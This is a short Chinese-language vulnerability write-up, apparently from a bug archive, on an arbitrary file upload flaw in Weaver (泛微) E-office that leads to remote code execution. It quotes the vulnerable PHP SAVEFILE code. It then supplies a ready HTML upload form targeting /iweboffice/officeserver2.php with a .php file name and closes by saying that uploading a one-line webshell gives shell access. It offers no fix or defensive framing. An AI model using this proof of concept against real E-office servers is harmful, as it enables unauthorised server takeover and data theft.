泛微Eoffice任意文件上传可直接getshell

参考链接：https://bugs.shuimugan.com/bug/view?bug_no=125638

1.某文件多处任意文件上传，可直接getshell ，相关代码如下

 case "SAVEFILE" :
                $mRecordID = $RECORDID;
                $mUserName = $USERNAME;
                $mFileName = $FILENAME;
                $mFileType = $FILETYPE;
                $mDescript = $DESCRIPT;
                $mFileDate = $FileDate;
                $mFullPath = $mFilePath."/".$mFileName;
                if ( is_uploaded_file( $_FILES['MsgFileBody']['tmp_name'] ) )
                {
                                if ( move_uploaded_file( $_FILES['MsgFileBody']['tmp_name'], $mFullPath ) )
                                {
                                                $mFileSize = $_FILES['MsgFileBody']['size'];
                                                $result = true;
                                }
                                else
                                {
                                                $MsgObj->MsgError( "Save File Error" );
                                                $result = false;
                                }
                }

2.我们要构造一份表单
OPTION为SAVEFILE，FILENAME是保存的文件名可以自己命名

<select>
  <option value ="volvo">SAVEFILE</option>
</select>
<form method='post' action='/iweboffice/officeserver2.php?OPTION=SAVEFILE&FILENAME=test.php'  enctype="multipart/form-data" > 
<input type="file" name="MsgFileBody" style="height:20px;BORDER: #8F908B 1px solid;"/></br></br>
<button type=submit value="上传">上传</button> </form>

上传一句话木马即可获取webshell